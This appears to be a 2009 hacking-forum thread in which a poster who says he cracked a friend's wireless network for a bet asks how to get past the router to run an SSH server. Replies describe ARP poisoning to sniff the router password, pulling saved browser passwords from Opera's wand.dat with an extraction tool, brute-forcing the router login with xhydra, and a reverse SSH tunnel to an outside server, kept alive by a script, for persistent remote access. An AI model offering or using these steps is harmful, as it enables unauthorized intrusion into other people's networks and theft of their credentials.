Warfusion Posted December 5, 2009 Share Posted December 5, 2009 Hey all. My friend and i have a bet that i cant crack his wireless which is done and use it to set up a ssh server. the only problem im having is port forwarding on his router any ideas? Quote Link to comment Share on other sites More sharing options...
Sparda Posted December 5, 2009 Share Posted December 5, 2009 UPnP might be enabled. Quote Link to comment Share on other sites More sharing options...
Kerberos Posted December 5, 2009 Share Posted December 5, 2009 Well, it's a dirty trick and would probably be fairly obvious, but if you already have access to the wireless you can start a packet capture and then one-way ARP poison him (basically disconnecting him) and wait until he logs into the router to check out what's going on. This is, of course, assuming the he knows how to do that. But based on the fact that he dared you to get an SSH server going I'm going to assume that he does (which is why I don't bother suggesting trying default passwords). Grab the password from the packet capture and you're set. That's the best I can come up with. Usually when I need to get into a router it's used by people who could care less about security (and so everything is default) and probably don't even know how to get to the login page. I've never tried getting into a router that's on a network with people that actually know how to log into it :P. That's an interesting bet. My grandma bet me I couldn't get into her computer a few days ago but it just doesn't feel right hacking into an old woman's computer. Call me old fashioned but I just couldn't take her up on it :P. Quote Link to comment Share on other sites More sharing options...
Ingo Posted December 5, 2009 Share Posted December 5, 2009 If you friend uses Firefox as his primary browser there is a high chance he has routers login in saved passwords. So if you can get your hand on it you may get lucky. Only other methods I can think about are sniffing it (what Kerberos said) and brute-forcing. Quote Link to comment Share on other sites More sharing options...
Warfusion Posted December 6, 2009 Author Share Posted December 6, 2009 @ sparda no UPnP isnt enabled haha @kerberos i didnt think of dat good tip ill try that @ingo lol he uses Opera rofl Quote Link to comment Share on other sites More sharing options...
Ingo Posted December 6, 2009 Share Posted December 6, 2009 Not sure about Opera, but I guess it also has the option of saving passwords like every other browser. With Opera though I don't really know where to get the passes, but little Googling should help you out. Quote Link to comment Share on other sites More sharing options...
Sud0x3 Posted December 6, 2009 Share Posted December 6, 2009 Seems like an odd bet! On the matter of opera passwords. They are stored under a file "wand.dat" in operas program files folder. If my memory serves me right there is a tool called unwand which can extract passwords from wand.dat if a master password is not used. Quote Link to comment Share on other sites More sharing options...
Warfusion Posted December 6, 2009 Author Share Posted December 6, 2009 The bet started because i was bored and it seemed like a fun little project...plus $100 if i can get that server running before Christmas. But I'm going to try all of what you guys are telling me and let you know. :) Quote Link to comment Share on other sites More sharing options...
operat0r_001 Posted December 9, 2009 Share Posted December 9, 2009 if the ssid is the same as factory defualt likly he has never even logged into it .. if not default try xhydra and friends to brute force it with a small wordlist Quote Link to comment Share on other sites More sharing options...
taiyed14 Posted December 9, 2009 Share Posted December 9, 2009 I'm assuming you already have an SSH server running on the LAN, and now you want to access it from the WAN (Hence the port forwarding). try a reverse SSH tunnel. From the LAN ssh server initiate an ssh session to an external ssh server. ssh -R 9999:localhost:22 external.sshd.com then from the external ssh sever connect back to lan ssh server ssh -p 9999 localhost bingo, you now have an ssh connection into his LAN from the WAN. if you want to get real fancy, you can create a bash script to every few min on the server to keep the outbound connection alive. remember, keep it simple... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.